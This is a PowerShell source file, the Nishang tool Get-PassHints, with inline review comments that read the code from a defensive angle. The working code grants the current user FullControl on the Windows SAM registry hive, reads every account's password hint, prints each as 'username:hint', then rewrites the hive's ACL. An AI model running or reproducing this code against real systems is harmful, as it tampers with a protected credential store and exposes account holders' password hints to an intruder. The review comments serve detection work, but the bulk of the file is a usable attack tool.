function Get-PassHints {
<#
.SYNOPSIS
Nishang script which extracts password hint for users in clear text.
.DESCRIPTION
The script extracts password hints from SAM registry hive. The script needs Administrator privs to read SAM hive.

Reviewer notes (defensive reading of the code below):
- The function first grants the calling identity FullControl on HKLM\SAM\SAM\Domains,
  then reads each account's V and UserPasswordHint values through the HKLM: provider,
  and finally strips the caller's access rules again and writes the ACL back.
- The cleanup removes every rule whose identity matches the caller, not only the one
  that was added, so the resulting ACL may differ from the original one.
- The ACL write on the SAM hive is the most observable step of the script; if registry
  object auditing is configured on that key it should produce an audit record (NOTE(review):
  verify against the environment's audit policy).
.EXAMPLE
PS > Get-PassHints
.OUTPUTS
One "username:hint" string per account that has a UserPasswordHint value.
.LINK
http://www.labofapenetrationtester.com/2015/09/extracting-windows-users-password-hints.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()]
Param ()
#Set permissions to allow Access to SAM\SAM\Domains registry hive.
#http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
# Access rule for the current identity: FullControl, inherited by subkeys and values.
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
# The key is opened with ChangePermissions rights only; it is used to rewrite the ACL,
# the actual data read happens later via the HKLM: provider.
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
# NOTE(review): this handle is never closed, and $key is reassigned by the foreach below.
$key.SetAccessControl($acl)
#From powerdump from SET
# Parses the account name out of an account's V value: the name offset is read from
# bytes 0x0c-0x0f and shifted by 0xCC, the byte length from bytes 0x10-0x13, and the
# name itself is decoded as UTF-16LE. Returns $null for an empty/missing V value.
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
#Logic for extracting password hint
# One subkey per account under Users; each is read as a property bag.
$users = Get-ChildItem HKLM:\SAM\SAM\Domains\Account\Users\
# NOTE(review): $j is incremented below but never read.
$j = 0
foreach ($key in $users)
{
$value = Get-ItemProperty $key.PSPath
$j++
# Get-ItemProperty returns a single object per key here, so this inner loop runs once per account.
foreach ($hint in $value)
{
#Check for users who have passwordhint
# Only accounts with a UserPasswordHint value produce output.
if ($hint.UserPasswordHint)
{
$username = Get-UserName($hint.V)
# The hint is stored UTF-16LE, like the name.
$passhint = ([text.encoding]::Unicode).GetString($hint.UserPasswordHint)
# Output format: <username>:<hint>
Write-Output "$username`:$passhint"
}
}
}
#Remove the permissions added above.
# Drops every access rule whose identity matches the caller (pre-existing ones included)
# and writes the ACL back through the provider. Out-Null discards RemoveAccessRule's
# boolean result, so a rule that could not be removed is not reported.
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}